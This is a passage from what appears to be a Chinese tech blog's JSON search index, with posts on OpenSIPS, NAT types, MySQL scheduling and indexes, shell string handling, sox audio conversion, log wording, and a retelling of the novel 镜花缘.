module:模块是一些共享的库,在启动时按需加载。有些模块是用于在opensips脚本中提供功能,而有些模块是作为底层,为其他模块提供功能。 2. OpenSIP 核心 2.1. 传输层 传输层提供了对于各种协议的支持,如TCP、UDP、TLS、WebSocket\n2.2. SIP工厂层 SIP工厂层提供了对SIP协议的解析和构建。OpenSIPS实现了一种懒解析功能,懒解析的效率非常高。\n懒解析:懒解析就是只去解析SIP头,并不解析SIP头的字段内容。而是在需要读取头字段内容时,才去解析。所以可以理解为按需解析。有点类似于一些文件系统的写时复制功能。\n**惰性应用:**有一点非常重要,当你通过脚本提供的函数去改变SIP消息时,所作出的改变并不是实时作用到SIP消息上,而是在先存起来,而是当所有的SIP消息处理完成后才会去应用这些改变。举例来说,你首先通过函数给SIP消息添加了某个头,然后你通过函数去获取这个头的时,发现这个头并不存在,但是SIP消息再发送出去后,又携带了你添加的这个头。\n2.3. 路由脚本解析与执行 OpenSIPS在启动后,会将opensips.cfg解析并加载到内存中。一旦OpenSIPS正常运行了,opensips.cfg文件即使删了也不会影响到OpenSIPS的运行了。\n但是OpenSIPS并不支持热脚本更新,如果你改了脚本,让让运行的OpenSIPS具有添加的功能,那么必须将OpensSIPS重启。\nOpenSIPS的脚本有点类似于C或者Shell语言,如果你Shell写的很溜,OpenSIPS的脚本理解起来也会非常容易。\n2.4. 内存与锁管理 出于性能考虑,OpenSIPS自己内部实现了内存和锁的管理,这部分在内容在脚本中是不可见的。\n2.5. 脚本变量和脚本函数 OpenSIPS核心提供的脚本变量和函数比较有限,外围的模块提供和很多的变量和函数。这些变量和函数的存在,都是为了让你易于获取SIP消息的某些字段,或者对SIP消息进行修改。\n2.6. SQL接口类 OpenSIPS 核心实现了接口的定义,但是并没有实现接口。接口的实现由外部的模块提供,这样做的函数可以使用不同的数据库。\n2.7. MI管理接口 mi接口用来管理OpenSIPS, 可以实现以下功能\n向OpenSIPS 发送数据 从OpenSIPS 获取数据 触发OpenSIPS 的内部行为 ","permalink":"https://wdd.js.org/opensips/ch3/about-opensips/","summary":"1. OpenSIPS架构 OpenSIPS主要有两部分构成,\ncore: 提供底层工具、接口、资源 module:模块是一些共享的库,在启动时按需加载。有些模块是用于在opensips脚本中提供功能,而有些模块是作为底层,为其他模块提供功能。 2. OpenSIP 核心 2.1. 传输层 传输层提供了对于各种协议的支持,如TCP、UDP、TLS、WebSocket\n2.2. SIP工厂层 SIP工厂层提供了对SIP协议的解析和构建。OpenSIPS实现了一种懒解析功能,懒解析的效率非常高。\n懒解析:懒解析就是只去解析SIP头,并不解析SIP头的字段内容。而是在需要读取头字段内容时,才去解析。所以可以理解为按需解析。有点类似于一些文件系统的写时复制功能。\n**惰性应用:**有一点非常重要,当你通过脚本提供的函数去改变SIP消息时,所作出的改变并不是实时作用到SIP消息上,而是在先存起来,而是当所有的SIP消息处理完成后才会去应用这些改变。举例来说,你首先通过函数给SIP消息添加了某个头,然后你通过函数去获取这个头的时,发现这个头并不存在,但是SIP消息再发送出去后,又携带了你添加的这个头。\n2.3. 路由脚本解析与执行 OpenSIPS在启动后,会将opensips.cfg解析并加载到内存中。一旦OpenSIPS正常运行了,opensips.cfg文件即使删了也不会影响到OpenSIPS的运行了。\n但是OpenSIPS并不支持热脚本更新,如果你改了脚本,让让运行的OpenSIPS具有添加的功能,那么必须将OpensSIPS重启。\nOpenSIPS的脚本有点类似于C或者Shell语言,如果你Shell写的很溜,OpenSIPS的脚本理解起来也会非常容易。\n2.4. 内存与锁管理 出于性能考虑,OpenSIPS自己内部实现了内存和锁的管理,这部分在内容在脚本中是不可见的。\n2.5. 脚本变量和脚本函数 OpenSIPS核心提供的脚本变量和函数比较有限,外围的模块提供和很多的变量和函数。这些变量和函数的存在,都是为了让你易于获取SIP消息的某些字段,或者对SIP消息进行修改。\n2.6. SQL接口类 OpenSIPS 核心实现了接口的定义,但是并没有实现接口。接口的实现由外部的模块提供,这样做的函数可以使用不同的数据库。\n2.7. MI管理接口 mi接口用来管理OpenSIPS, 可以实现以下功能\n向OpenSIPS 发送数据 从OpenSIPS 获取数据 触发OpenSIPS 的内部行为 ","title":"opensips介绍"},{"content":"从MySql5.1.6增加计划任务功能\n判断计划任务是否启动 SHOW VARIABLES LIKE \u0026#39;event_scheduler\u0026#39; 开启计划任务 set global event_scheduler=on 创建计划任务 create test_e on scheduler every 1 day do sql 修改计划任务 # 临时关闭事件 ALTER EVENT e_test DISABLE; # 开启事件 ALTER EVENT e_test ENABLE; # 将每天清空test表改为5天清空一次 ALTER EVENT e_test ON SCHEDULE EVERY 5 DAY; 删除计划任务 drop event e_test ","permalink":"https://wdd.js.org/posts/2019/11/xss1vk/","summary":"从MySql5.1.6增加计划任务功能\n判断计划任务是否启动 SHOW VARIABLES LIKE \u0026#39;event_scheduler\u0026#39; 开启计划任务 set global event_scheduler=on 创建计划任务 create test_e on scheduler every 1 day do sql 修改计划任务 # 临时关闭事件 ALTER EVENT e_test DISABLE; # 开启事件 ALTER EVENT e_test ENABLE; # 将每天清空test表改为5天清空一次 ALTER EVENT e_test ON SCHEDULE EVERY 5 DAY; 删除计划任务 drop event e_test ","title":"Mysql计划任务:Event Scheduler"},{"content":" NAT的产生原因是IPv4的地址不够用,网络中的部分主机只能公用一个外网IP。 NAT工作在网络层和传输层,主要是对IP地址和端口号的改变 NAT的优点 节约公网IP 安全性更好,所有流量都需要经过入口的防火墙 NAT的缺点 对于UPD应用不够友好 NAT 工作原理 内部的设备X, 经过NAT设备后,NAT设备会改写源IP和端口 NAT 类型 1. 全锥型 每个内部主机都有一个静态绑定的外部ip:port 任何主机发往NAT设备上特定ip:port的包,都会被转发给绑定的主机 这种方式的缺点很明显,黑客可以使用端口扫描工具,扫描出暴露的端口,然后通过这个端口攻击内部主机 在内部主机没有往外发送流量时,外部流量也能够进入内部主机 -\n2. 限制锥形 NAT上的ip:port与内部主机是动态绑定的 如果内部主机没有向某个主机先发送过包,那么NAT会拒绝外部主机进入的流量 3. 端口限制型 端口限制型除了有限制锥型的要求外,还增加了端口的限制 4. 对称型 对称型最难穿透,因为每次交互NAT都会使用不同的端口号,所以内外网端口映射根本无法预测 NAT对比表格 NAT类型 收数据前是否需要先发送数据 是否能够预测下一次的NAT打开的端口对 是否限制包的目的ip:port 全锥形 否 是 否 限制锥形 是 是 仅限制IP 端口限制型 是 是 是 对称型 是 否 是 ","permalink":"https://wdd.js.org/opensips/ch1/deep-in-nat/","summary":" NAT的产生原因是IPv4的地址不够用,网络中的部分主机只能公用一个外网IP。 NAT工作在网络层和传输层,主要是对IP地址和端口号的改变 NAT的优点 节约公网IP 安全性更好,所有流量都需要经过入口的防火墙 NAT的缺点 对于UPD应用不够友好 NAT 工作原理 内部的设备X, 经过NAT设备后,NAT设备会改写源IP和端口 NAT 类型 1. 全锥型 每个内部主机都有一个静态绑定的外部ip:port 任何主机发往NAT设备上特定ip:port的包,都会被转发给绑定的主机 这种方式的缺点很明显,黑客可以使用端口扫描工具,扫描出暴露的端口,然后通过这个端口攻击内部主机 在内部主机没有往外发送流量时,外部流量也能够进入内部主机 -\n2. 限制锥形 NAT上的ip:port与内部主机是动态绑定的 如果内部主机没有向某个主机先发送过包,那么NAT会拒绝外部主机进入的流量 3. 端口限制型 端口限制型除了有限制锥型的要求外,还增加了端口的限制 4. 对称型 对称型最难穿透,因为每次交互NAT都会使用不同的端口号,所以内外网端口映射根本无法预测 NAT对比表格 NAT类型 收数据前是否需要先发送数据 是否能够预测下一次的NAT打开的端口对 是否限制包的目的ip:port 全锥形 否 是 否 限制锥形 是 是 仅限制IP 端口限制型 是 是 是 对称型 是 否 是 ","title":"深入NAT网络"},{"content":"如果你仅仅是本地运行OpenSIPS, 你可以不用管什么对外公布地址。但是如果你的SIP服务器想在公网环境提供服务,则必然要深刻的理解对外公布地址。\n在一个集群中,可能有多台SIP服务器,例如如下图的网络架构中\nregister 负责注册相关的业务 192.168.1.100(内网) uas 负责呼叫相关的业务 192.168.1.101(内网) entry 负责接入 192.168.1.102(内网),1.2.3.4(公网地址) 一般情况下,register和uas只有内外地址,没有公网地址。而entry既有内网地址,也有公网地址。公网地址一般是由云服务提供商分配的。\n我们希望内部网络register和uas以及entry必须使用内网通信,而entry和互联网使用公网通信。\n有时候经常遇到的问题就是某个请求,例如INVITE, uas从内网地址发送到了entry的公网地址上,这时候就可能产生一些列的奇葩问题。\n如何设置公布地址 listen as listen = udp:192.168.1.102:5060 as 1.2.3.4:5060 在listen 的参数上直接配置公布地址。好处的方便,后续如果调用record_route()或者add_path_received(), OpenSIPS会自动帮你选择对外公布地址。\n但是,OpenSIPS选择可能并不是我们想要的。\n例如: INVITE请求从内部发送到互联网,这时OpenSIPS能正常设置对外公布地址。但是如果请求从外表进入内部,OpenSIPS可能还是会用公网地址作为对外公布地址。\n所以,listen as虽然方便,但不够灵活。\nset_advertised_address() 和 set_advertised_port(int) set_advertised_address和set_advertised_port属于OpenSIPS和核心函数部分,可以在脚本里根据不同条件,灵活的设置公布地址。\n例如:\nif 请求发生到公网 { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ⚠️ 如果你选择用set_advertised_address和set_advertised_port来手动设置,就千万不要用as了。\n几个注意点SIP头 record_route头 Path头 上面的两个头,在OpenSIPS里可以用下面的函数去设置。设置的时候,务必要主义选择合适的网络地址。否者请求将会不回按照你期望方式发送。\nrecord_route record_route_preset add_path add_path_received ","permalink":"https://wdd.js.org/opensips/ch5/adv-address/","summary":"如果你仅仅是本地运行OpenSIPS, 你可以不用管什么对外公布地址。但是如果你的SIP服务器想在公网环境提供服务,则必然要深刻的理解对外公布地址。\n在一个集群中,可能有多台SIP服务器,例如如下图的网络架构中\nregister 负责注册相关的业务 192.168.1.100(内网) uas 负责呼叫相关的业务 192.168.1.101(内网) entry 负责接入 192.168.1.102(内网),1.2.3.4(公网地址) 一般情况下,register和uas只有内外地址,没有公网地址。而entry既有内网地址,也有公网地址。公网地址一般是由云服务提供商分配的。\n我们希望内部网络register和uas以及entry必须使用内网通信,而entry和互联网使用公网通信。\n有时候经常遇到的问题就是某个请求,例如INVITE, uas从内网地址发送到了entry的公网地址上,这时候就可能产生一些列的奇葩问题。\n如何设置公布地址 listen as listen = udp:192.168.1.102:5060 as 1.2.3.4:5060 在listen 的参数上直接配置公布地址。好处的方便,后续如果调用record_route()或者add_path_received(), OpenSIPS会自动帮你选择对外公布地址。\n但是,OpenSIPS选择可能并不是我们想要的。\n例如: INVITE请求从内部发送到互联网,这时OpenSIPS能正常设置对外公布地址。但是如果请求从外表进入内部,OpenSIPS可能还是会用公网地址作为对外公布地址。\n所以,listen as虽然方便,但不够灵活。\nset_advertised_address() 和 set_advertised_port(int) set_advertised_address和set_advertised_port属于OpenSIPS和核心函数部分,可以在脚本里根据不同条件,灵活的设置公布地址。\n例如:\nif 请求发生到公网 { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ⚠️ 如果你选择用set_advertised_address和set_advertised_port来手动设置,就千万不要用as了。\n几个注意点SIP头 record_route头 Path头 上面的两个头,在OpenSIPS里可以用下面的函数去设置。设置的时候,务必要主义选择合适的网络地址。否者请求将会不回按照你期望方式发送。\nrecord_route record_route_preset add_path add_path_received ","title":"【必读】深入对外公布地址"},{"content":"下面的日志是打印出socket.io断开的信息\n// bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 但是这条日志不利于关键词搜索,如果搜disconnect,那么可能很多地方都有这个关键词。\n// good logger.info(`socket.io disconnect ${socket.handshake.query.agentId} reason: ${reason} ${socket.id}`) // bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 总结经验\n多个关键词位置要靠前 多个关键词要集中 日志日志要标记来自特殊的用于,比如说,来自 ","permalink":"https://wdd.js.org/posts/2019/11/xa694b/","summary":"下面的日志是打印出socket.io断开的信息\n// bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 但是这条日志不利于关键词搜索,如果搜disconnect,那么可能很多地方都有这个关键词。\n// good logger.info(`socket.io disconnect ${socket.handshake.query.agentId} reason: ${reason} ${socket.id}`) // bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 总结经验\n多个关键词位置要靠前 多个关键词要集中 日志日志要标记来自特殊的用于,比如说,来自 ","title":"打印易于提取关键词的日志"},{"content":" 五大单元 输入单元 CPU:算术,逻辑,内存 输出单元 指令集 精简指令集 福仔指令集 ","permalink":"https://wdd.js.org/posts/2019/11/qy6ugu/","summary":" 五大单元 输入单元 CPU:算术,逻辑,内存 输出单元 指令集 精简指令集 福仔指令集 ","title":"Linux私房菜"},{"content":"《镜花缘》是清代李汝珍写的一部长篇小说,小说前半部分是主角游历海外各国的清代经历,有点像日本动漫海贼王。后半部分比较无趣,略过不提。\n单讲小说的前半部分,小说发生在唐代,主角叫做唐敖,本来科举中了探花,但是因为他和讨伐武则天的徐敬业有结拜之交,被人告发,遂革去了探花,降为秀才。\n唐敖心灰意冷,煮熟的鸭子就这么飞了。于是决定舍弃功名,游历山水。正好他的妹夫,林之洋是个跑远洋贸易的。\n唐敖正好搭上了妹夫的顺风船,环游世界之旅就这么开始了!!\n1. 君子国 君子国讲究好让不正,惟善为宝。说的是这个国家的人啊,素质非常高,高到什么地步呢?高到有点反人类。\n下面的一个场景,是我从小说中简化的一个场景:\n买家说:老板,你的东西质量真好,价格却那么低,如果我买了去,我内心会不安的。跪求你抬高些价格,我才买,不然我就不买了。\n店铺老板说:我要的价格这么高,已经觉得过意不去了,如果你还让我涨价,还你还是去别的地方买东西吧。\n买家说:既然你不愿意涨价,那也行,我还按照这个价格买你的东西,但是我只拿一半东西走。\n是不是很反人类,从来只见过买家想要压低价格的,还未听说过买家想抬高价格的。\n2. 大人国 此处的大人国,并不是说他们的身材巨大,而是形容他们国人的品格高大。他们都是争相做善事,不作恶事。\n除此以外,在他们的国家,很容易区分好人和坏人。他们所有的人脚下都踩着云。光明正大的人,脚下是彩云;经常做坏事的人,脚下是黑云。\n云的色彩会随着人的品行而变化,坏人如果能够向善,足下也会产生彩云。\n有些大官人,不希望别人看到他们脚下云的颜色,所以会用布裹上,但是这样做岂不是掩耳盗铃吗?\n3. 黑齿国 这个国家的人全身通黑,连牙齿都是黑的。我怀疑作者是不是去过非洲,但是非洲人的牙齿往往都是白色的。\n但是人不可貌相,黑齿国的人非常喜欢读书,个个都是满腹经纶。而且这个地方的小偷,只会偷书,却不偷金银宝物。\n4. 劳民国 该国的人也是面色墨黑,走路都是摇摇晃晃,终日忙忙碌碌。但是呢,这个国家的人每个都是长寿。\n5. 聂耳国 聂耳国的耳朵很长,长耳及腰,走路都需要用手去捧着耳朵。更有甚者,耳朵及地。\n除了耳朵长的这个特点之外,有的人耳朵也特别大。据说可以一个耳朵当床垫,一个耳朵当棉被,睡在自己的耳朵里。\n6. 无肠国 这个国家的人都没有肠子,无论吃喝什么东西,都会立即排出体外。所以他们在吃饭之前,都先找好厕所,不然就变成随地大小便了。\n更为恶心的是,因为他们吃的快也拉的快,很多食物都没有消化完全。所以有些人就把拉出来的便便收集起来,再给其他人吃。\n7. 鬼国 国人夜晚不睡觉,颠倒白天黑夜,行为似鬼。\n8. 毛民国 国人一身长毛,据说是上一世太为吝啬,一毛不拔。所以阎王让他下一世出生在毛民国,让他们满身长满毛。\n9. 无继国 国人从不生育,也没有孩子。而且他们也不区分男女。\n之所以他们国家的人口没有减少,是因为人死后120年之后还会再次复活。\n所以他们都是死了又活,活了有死。\n10. 深目国 他们脸上没有眼睛,他们的两个眼睛都长在自己的手掌里。是不是觉得似曾相识呢?火影里面的我爱罗。\n","permalink":"https://wdd.js.org/posts/2019/10/zfn92c/","summary":"《镜花缘》是清代李汝珍写的一部长篇小说,小说前半部分是主角游历海外各国的清代经历,有点像日本动漫海贼王。后半部分比较无趣,略过不提。\n单讲小说的前半部分,小说发生在唐代,主角叫做唐敖,本来科举中了探花,但是因为他和讨伐武则天的徐敬业有结拜之交,被人告发,遂革去了探花,降为秀才。\n唐敖心灰意冷,煮熟的鸭子就这么飞了。于是决定舍弃功名,游历山水。正好他的妹夫,林之洋是个跑远洋贸易的。\n唐敖正好搭上了妹夫的顺风船,环游世界之旅就这么开始了!!\n1. 君子国 君子国讲究好让不正,惟善为宝。说的是这个国家的人啊,素质非常高,高到什么地步呢?高到有点反人类。\n下面的一个场景,是我从小说中简化的一个场景:\n买家说:老板,你的东西质量真好,价格却那么低,如果我买了去,我内心会不安的。跪求你抬高些价格,我才买,不然我就不买了。\n店铺老板说:我要的价格这么高,已经觉得过意不去了,如果你还让我涨价,还你还是去别的地方买东西吧。\n买家说:既然你不愿意涨价,那也行,我还按照这个价格买你的东西,但是我只拿一半东西走。\n是不是很反人类,从来只见过买家想要压低价格的,还未听说过买家想抬高价格的。\n2. 大人国 此处的大人国,并不是说他们的身材巨大,而是形容他们国人的品格高大。他们都是争相做善事,不作恶事。\n除此以外,在他们的国家,很容易区分好人和坏人。他们所有的人脚下都踩着云。光明正大的人,脚下是彩云;经常做坏事的人,脚下是黑云。\n云的色彩会随着人的品行而变化,坏人如果能够向善,足下也会产生彩云。\n有些大官人,不希望别人看到他们脚下云的颜色,所以会用布裹上,但是这样做岂不是掩耳盗铃吗?\n3. 黑齿国 这个国家的人全身通黑,连牙齿都是黑的。我怀疑作者是不是去过非洲,但是非洲人的牙齿往往都是白色的。\n但是人不可貌相,黑齿国的人非常喜欢读书,个个都是满腹经纶。而且这个地方的小偷,只会偷书,却不偷金银宝物。\n4. 劳民国 该国的人也是面色墨黑,走路都是摇摇晃晃,终日忙忙碌碌。但是呢,这个国家的人每个都是长寿。\n5. 聂耳国 聂耳国的耳朵很长,长耳及腰,走路都需要用手去捧着耳朵。更有甚者,耳朵及地。\n除了耳朵长的这个特点之外,有的人耳朵也特别大。据说可以一个耳朵当床垫,一个耳朵当棉被,睡在自己的耳朵里。\n6. 无肠国 这个国家的人都没有肠子,无论吃喝什么东西,都会立即排出体外。所以他们在吃饭之前,都先找好厕所,不然就变成随地大小便了。\n更为恶心的是,因为他们吃的快也拉的快,很多食物都没有消化完全。所以有些人就把拉出来的便便收集起来,再给其他人吃。\n7. 鬼国 国人夜晚不睡觉,颠倒白天黑夜,行为似鬼。\n8. 毛民国 国人一身长毛,据说是上一世太为吝啬,一毛不拔。所以阎王让他下一世出生在毛民国,让他们满身长满毛。\n9. 无继国 国人从不生育,也没有孩子。而且他们也不区分男女。\n之所以他们国家的人口没有减少,是因为人死后120年之后还会再次复活。\n所以他们都是死了又活,活了有死。\n10. 深目国 他们脸上没有眼睛,他们的两个眼睛都长在自己的手掌里。是不是觉得似曾相识呢?火影里面的我爱罗。","title":"带你领略镜花缘中的神奇国度"},{"content":"主要的数据运算方式\nlet (()) [] expr bc 使用 let 使用 let 时,等号右边的变量不需要在加上$符号\n#!/bin/bash no1=1; no2=2; # 注意两个变量的值的类型实际上是字符串 re1=$no1+$no2 # 注意此时re1的值是1+2 let result=no1+no2 # 此时才是想获取的两数字的和,3 ","permalink":"https://wdd.js.org/shell/match-eval/","summary":"主要的数据运算方式\nlet (()) [] expr bc 使用 let 使用 let 时,等号右边的变量不需要在加上$符号\n#!/bin/bash no1=1; no2=2; # 注意两个变量的值的类型实际上是字符串 re1=$no1+$no2 # 注意此时re1的值是1+2 let result=no1+no2 # 此时才是想获取的两数字的和,3 ","title":"shell数学运算"},{"content":"获取字符串长度 需要在变量前加个**#**\nname=wdd echo ${#name} 首尾去空格 echo \u0026#34; abcd \u0026#34; | xargs 字符串包含 # $var是否包含字符串A if [[ $var =~ \u0026#34;A\u0026#34; ]]; then echo fi # $var是否以字符串A开头 if [[ $var =~ \u0026#34;^A\u0026#34; ]]; then echo fi # $var是否以字符串A结尾 if [[ $var =~ \u0026#34;A$\u0026#34; ]]; then echo fi 字符串提取 #!/bin/bash num1=${test#*_} num2=${num1#*_} surname=${num2%_*} num4=${test##*_} profession=${num4%.*} #*_ 从左边开始,去第一个符号“_”左边的所有字符 % _* 从右边开始,去掉第一个符号“_”右边的所有字符 ##*_ 从右边开始,去掉第一个符号“_”左边的所有字符 %%_* 从左边开始,去掉第一个符号“_”右边的所有字符 判断某个字符串是否以特定字符开头 if [[ $TAG =~ ABC* ]]; then echo $TAG is begin with ABC fi ","permalink":"https://wdd.js.org/shell/string-operator/","summary":"获取字符串长度 需要在变量前加个**#**\nname=wdd echo ${#name} 首尾去空格 echo \u0026#34; abcd \u0026#34; | xargs 字符串包含 # $var是否包含字符串A if [[ $var =~ \u0026#34;A\u0026#34; ]]; then echo fi # $var是否以字符串A开头 if [[ $var =~ \u0026#34;^A\u0026#34; ]]; then echo fi # $var是否以字符串A结尾 if [[ $var =~ \u0026#34;A$\u0026#34; ]]; then echo fi 字符串提取 #!/bin/bash num1=${test#*_} num2=${num1#*_} surname=${num2%_*} num4=${test##*_} profession=${num4%.*} #*_ 从左边开始,去第一个符号“_”左边的所有字符 % _* 从右边开始,去掉第一个符号“_”右边的所有字符 ##*_ 从右边开始,去掉第一个符号“_”左边的所有字符 %%_* 从左边开始,去掉第一个符号“_”右边的所有字符 判断某个字符串是否以特定字符开头 if [[ $TAG =~ ABC* ]]; then echo $TAG is begin with ABC fi ","title":"字符串操作"},{"content":"ab安装 apt-get install apache2-utils ","permalink":"https://wdd.js.org/posts/2019/10/pbv6ok/","summary":"ab安装 apt-get install apache2-utils ","title":"接口压力测试"},{"content":"apt-get install sox libsox-fmt-mp3 -y sox input.vox output.mp3 sox支持命令 ➜ vox sox --help sox: SoX v14.4.1 Usage summary: [gopts] [[fopts] infile]... [fopts] outfile [effect [effopt]]... SPECIAL FILENAMES (infile, outfile): - Pipe/redirect input/output (stdin/stdout); may need -t -d, --default-device Use the default audio device (where available) -n, --null Use the `null\u0026#39; file handler; e.g. with synth effect -p, --sox-pipe Alias for `-t sox -\u0026#39; SPECIAL FILENAMES (infile only): \u0026#34;|program [options] ...\u0026#34; Pipe input from external program (where supported) http://server/file Use the given URL as input file (where supported) GLOBAL OPTIONS (gopts) (can be specified at any point before the first effect): --buffer BYTES Set the size of all processing buffers (default 8192) --clobber Don\u0026#39;t prompt to overwrite output file (default) --combine concatenate Concatenate all input files (default for sox, rec) --combine sequence Sequence all input files (default for play) -D, --no-dither Don\u0026#39;t dither automatically --effects-file FILENAME File containing effects and options -G, --guard Use temporary files to guard against clipping -h, --help Display version number and usage information --help-effect NAME Show usage of effect NAME, or NAME=all for all --help-format NAME Show info on format NAME, or NAME=all for all --i, --info Behave as soxi(1) --input-buffer BYTES Override the input buffer size (default: as --buffer) --no-clobber Prompt to overwrite output file -m, --combine mix Mix multiple input files (instead of concatenating) --combine mix-power Mix to equal power (instead of concatenating) -M, --combine merge Merge multiple input files (instead of concatenating) --magic Use `magic\u0026#39; file-type detection --multi-threaded Enable parallel effects channels processing --norm Guard (see --guard) \u0026amp; normalise --play-rate-arg ARG Default `rate\u0026#39; argument for auto-resample with `play\u0026#39; --plot gnuplot|octave Generate script to plot response of filter effect -q, --no-show-progress Run in quiet mode; opposite of -S --replay-gain track|album|off Default: off (sox, rec), track (play) -R Use default random numbers (same on each run of SoX) -S, --show-progress Display progress while processing audio data --single-threaded Disable parallel effects channels processing --temp DIRECTORY Specify the directory to use for temporary files -T, --combine multiply Multiply samples of corresponding channels from all input files (instead of concatenating) --version Display version number of SoX and exit -V[LEVEL] Increment or set verbosity level (default 2); levels: 1: failure messages 2: warnings 3: details of processing 4-6: increasing levels of debug messages FORMAT OPTIONS (fopts): Input file format options need only be supplied for files that are headerless. Output files will have the same format as the input file where possible and not overriden by any of various means including providing output format options. -v|--volume FACTOR Input file volume adjustment factor (real number) --ignore-length Ignore input file length given in header; read to EOF -t|--type FILETYPE File type of audio -e|--encoding ENCODING Set encoding (ENCODING may be one of signed-integer, unsigned-integer, floating-point, mu-law, a-law, ima-adpcm, ms-adpcm, gsm-full-rate) -b|--bits BITS Encoded sample size in bits -N|--reverse-nibbles Encoded nibble-order -X|--reverse-bits Encoded bit-order --endian little|big|swap Encoded byte-order; swap means opposite to default -L/-B/-x Short options for the above -c|--channels CHANNELS Number of channels of audio data; e.g. 2 = stereo -r|--rate RATE Sample rate of audio -C|--compression FACTOR Compression factor for output format --add-comment TEXT Append output file comment --comment TEXT Specify comment text for the output file --comment-file FILENAME File containing comment text for the output file --no-glob Don\u0026#39;t `glob\u0026#39; wildcard match the following filename AUDIO FILE FORMATS: 8svx aif aifc aiff aiffc al amb amr-nb amr-wb anb au avr awb caf cdda cdr cvs cvsd cvu dat dvms f32 f4 f64 f8 fap flac fssd gsm gsrt hcom htk ima ircam la lpc lpc10 lu mat mat4 mat5 maud mp2 mp3 nist ogg paf prc pvf raw s1 s16 s2 s24 s3 s32 s4 s8 sb sd2 sds sf sl sln smp snd sndfile sndr sndt sou sox sph sw txw u1 u16 u2 u24 u3 u32 u4 u8 ub ul uw vms voc vorbis vox w64 wav wavpcm wv wve xa xi PLAYLIST FORMATS: m3u pls AUDIO DEVICE DRIVERS: alsa EFFECTS: allpass band bandpass bandreject bass bend biquad chorus channels compand contrast dcshift deemph delay dither divide+ downsample earwax echo echos equalizer fade fir firfit+ flanger gain highpass hilbert input# ladspa loudness lowpass mcompand mixer* noiseprof noisered norm oops output# overdrive pad phaser pitch rate remix repeat reverb reverse riaa silence sinc spectrogram speed splice stat stats stretch swap synth tempo treble tremolo trim upsample vad vol * Deprecated effect + Experimental effect # LibSoX-only effect EFFECT OPTIONS (effopts): effect dependent; see --help-effect 参考 http://sox.sourceforge.net/sox.html#OPTIONS ","permalink":"https://wdd.js.org/posts/2019/10/nw4wmm/","summary":"apt-get install sox libsox-fmt-mp3 -y sox input.vox output.mp3 sox支持命令 ➜ vox sox --help sox: SoX v14.4.1 Usage summary: [gopts] [[fopts] infile]... [fopts] outfile [effect [effopt]]... SPECIAL FILENAMES (infile, outfile): - Pipe/redirect input/output (stdin/stdout); may need -t -d, --default-device Use the default audio device (where available) -n, --null Use the `null\u0026#39; file handler; e.g. with synth effect -p, --sox-pipe Alias for `-t sox -\u0026#39; SPECIAL FILENAMES (infile only): \u0026#34;|program [options] ...\u0026#34; Pipe input from external program (where supported) http://server/file Use the given URL as input file (where supported) GLOBAL OPTIONS (gopts) (can be specified at any point before the first effect): --buffer BYTES Set the size of all processing buffers (default 8192) --clobber Don\u0026#39;t prompt to overwrite output file (default) --combine concatenate Concatenate all input files (default for sox, rec) --combine sequence Sequence all input files (default for play) -D, --no-dither Don\u0026#39;t dither automatically --effects-file FILENAME File containing effects and options -G, --guard Use temporary files to guard against clipping -h, --help Display version number and usage information --help-effect NAME Show usage of effect NAME, or NAME=all for all --help-format NAME Show info on format NAME, or NAME=all for all --i, --info Behave as soxi(1) --input-buffer BYTES Override the input buffer size (default: as --buffer) --no-clobber Prompt to overwrite output file -m, --combine mix Mix multiple input files (instead of concatenating) --combine mix-power Mix to equal power (instead of concatenating) -M, --combine merge Merge multiple input files (instead of concatenating) --magic Use `magic\u0026#39; file-type detection --multi-threaded Enable parallel effects channels processing --norm Guard (see --guard) \u0026amp; normalise --play-rate-arg ARG Default `rate\u0026#39; argument for auto-resample with `play\u0026#39; --plot gnuplot|octave Generate script to plot response of filter effect -q, --no-show-progress Run in quiet mode; opposite of -S --replay-gain track|album|off Default: off (sox, rec), track (play) -R Use default random numbers (same on each run of SoX) -S, --show-progress Display progress while processing audio data --single-threaded Disable parallel effects channels processing --temp DIRECTORY Specify the directory to use for temporary files -T, --combine multiply Multiply samples of corresponding channels from all input files (instead of concatenating) --version Display version number of SoX and exit -V[LEVEL] Increment or set verbosity level (default 2); levels: 1: failure messages 2: warnings 3: details of processing 4-6: increasing levels of debug messages FORMAT OPTIONS (fopts): Input file format options need only be supplied for files that are headerless.","title":"vox语音转mp3"},{"content":"prd是表名,agent是表中的一个字段,index_agent是索引名\ncreate index index_agent on prd(agent) # 创建索引 show index from prd # 显示表上有哪些索引 drop index index_agent on prd # 删除索引 创建索引的好处是查询速度有极大的提成,坏处是更新记录时,有可能也会更新索引,从而降低性能。\n所以索引比较适合那种只写入,或者查询,但是一般不会更新的数据。\n","permalink":"https://wdd.js.org/posts/2019/10/bs9nax/","summary":"prd是表名,agent是表中的一个字段,index_agent是索引名\ncreate index index_agent on prd(agent) # 创建索引 show index from prd # 显示表上有哪些索引 drop index index_agent on prd # 删除索引 创建索引的好处是查询速度有极大的提成,坏处是更新记录时,有可能也会更新索引,从而降低性能。\n所以索引比较适合那种只写入,或者查询,但是一般不会更新的数据。","title":"MySql索引"},{"content":"今天逛github trending, 发现榜首有个项目,叫做v语言。https://github.com/vlang/v\n看了介绍,说这个语言非常牛X,几乎囊括了所有语言的长处。性能、编译耗时、内存使用都是碾压其他语言。\n但是,要记住张无忌娘说过的一句话:越是漂亮的女人,越会骗人。\n每一门语言都是由特定的使用场景,从而则决定了该语言在该场景下解决问题的能力。\n不谈使用场景,而仅仅强调优点,往往是耍流氓。\n你看JavaScript一出生,就是各种问题,但是在浏览器里,JavaScript就是能够一统天下,无人能够掩盖其锋芒。\n","permalink":"https://wdd.js.org/posts/2019/10/awgyhh/","summary":"今天逛github trending, 发现榜首有个项目,叫做v语言。https://github.com/vlang/v\n看了介绍,说这个语言非常牛X,几乎囊括了所有语言的长处。性能、编译耗时、内存使用都是碾压其他语言。\n但是,要记住张无忌娘说过的一句话:越是漂亮的女人,越会骗人。\n每一门语言都是由特定的使用场景,从而则决定了该语言在该场景下解决问题的能力。\n不谈使用场景,而仅仅强调优点,往往是耍流氓。\n你看JavaScript一出生,就是各种问题,但是在浏览器里,JavaScript就是能够一统天下,无人能够掩盖其锋芒。","title":"关于v语言: 